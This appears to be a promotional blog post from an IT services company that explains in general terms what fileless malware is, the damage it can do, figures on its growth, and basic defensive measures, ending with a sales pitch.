Understanding Fileless Malware
Though fileless malware has been around much longer, it only became a mainstream method of cyberattack in 2017. With fileless malware, cybercriminals are able to use legitimate tools and services, such as existing software, applications, and authorized protocols, to carry out malicious activities like unauthorized data retrieval or data damage. Left unchecked, these types of malware can adversely affect your business processes and the infrastructures that run them.
What is fileless malware?
Fileless malware is malicious software that doesn’t rely on executable files to infect your infrastructure. Rather, it hides in your computer’s random access memory and uses trusted, legitimate processes, such as Microsoft Office macros, PowerShell, and Windows Management Instrumentation.
It isn’t as visible as traditional malware. It uses a variety of techniques to stay persistent and can adversely affect the integrity of a business’s processes and the infrastructures that run them. Because there are no files to trace, fileless malware escapes detection by most anti-malware programs, especially those that use the databases of known threats. Most automated sensors cannot recognize illicit scripts, and cybersecurity analysts who are trained to identify them usually have a hard time determining where to look.
What potential damage can it do?
If it is not detected and removed, fileless malware can do a lot of damage to business systems, such as:
- Steal or destroy data
- Modify files without authorization
- Act as a backdoor for other types of malware
- Cause system crashes and instability
- Disrupt normal operations by taking up CPU time or memory
Examples of high-profile fileless malware attacks include the Democratic National Committee hacking in 2016 and the Equifax data breach in 2017.
How big of a threat is it?
Cybersecurity provider WatchGuard Technologies’s Internet Security Report for Q4 2020 found that fileless malware attacks during the year jumped by 888% from 2019. Worse still, their Q2 2021 report revealed that just halfway through 2021, the number of detections originating from scripting engines like PowerShell was already at 80% of 2020’s total script-initiated attack volume.
How can you defend against fileless malware?
Your business should practice defense in depth in which you implement multiple safeguards to reduce exposure and mitigate damage. Such safeguards include keeping your systems updated, limiting user access rights and privileges, cultivating a security-aware workforce, and utilizing advanced security solutions that analyze behavioral trends. Lastly, you should also partner with a managed IT services provider that offers 24/7 network monitoring, security audit, and penetration testing. Contact us today to get started.